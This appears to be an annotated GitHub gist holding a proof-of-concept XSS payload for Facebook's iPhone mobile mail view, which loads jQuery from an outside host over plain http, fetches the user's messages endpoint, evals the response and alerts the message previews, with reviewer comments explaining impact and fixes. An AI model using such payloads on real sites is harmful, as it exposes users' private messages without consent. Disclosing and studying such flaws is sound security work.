

@streghstreek
Created April 19, 2021 16:13
iPhone app XSS in Facebook Mail
<!--
  Proof-of-concept script for the XSS named in the gist title. It demonstrates impact:
  once injected markup is executed by the mail view, script can request the messages
  endpoint and read the message previews it returns.
  NOTE(review): this presumably executes inside the iphone.facebook.com origin with the
  signed-in user's session; otherwise the same-origin policy would block reading the
  response below. Confirm against the original report.
  The first script element pulls jQuery 1.4.4 from a third-party host over plain http
  with no integrity attribute, so the page executes whatever that host (or anyone on
  the network path) serves.
  Defensive reading: the fix belongs on the rendering side (encode message content on
  output so it never becomes a script element); a Content-Security-Policy that
  disallows inline script and unlisted script hosts would stop both script elements here.
-->
<script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>
<script type="text/javascript">
// http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9
// NOTE(review): the URL above is not referenced by the code below; presumably a related
// endpoint or the injection context. Confirm.

// Runs once the DOM is ready (jQuery ready shorthand).
$(function(){
// Assigned without var, so parse_messages becomes an implicit global.
parse_messages = function()
{
// Visit every element matching the preview-snippet selector currently in the document.
$('.twoLines.preview>.snippet').each(function(index,value)
{
// Strip anything that looks like a tag with a regex, leaving the text of the preview.
// This is display clean-up only; a regex like this is not an HTML sanitizer.
// lines is also an implicit global.
lines = value.innerHTML.replace(/(<([^>]+)>)/ig,'');
// Shows the preview text locally; nothing in this snippet sends it anywhere.
alert(lines);
});
};
// Request the messages view through its AJAX endpoint.
$.ajax({
url:"https://iphone.facebook.com/messages/?refid=7&__ajax__&__m_async_page__&__jewels__&__metablock__=3",
success:function(data)
{
// substr(9) drops the first nine characters of the response before evaluation.
// Presumably this is an anti-JSON-hijacking prefix ("for (;;);" is nine characters);
// confirm. Such a prefix guards against cross-site script inclusion only; it does
// nothing against script that already runs same-origin and can read the raw body.
// eval() executes the remainder as JavaScript to obtain the response object
// (x is an implicit global).
x = eval('('+data.substr(9)+')');
// Writes the HTML fragment at x.m[1].html into a hidden div so its elements can be
// queried. NOTE(review): if the document has already finished parsing when this
// callback fires, document.write implicitly reopens the document and replaces it.
document.write('<div style="display:none;">'+x.m[1].html+'</div>');
// Read the previews out of the markup that was just written.
parse_messages();
}
});
});
</script>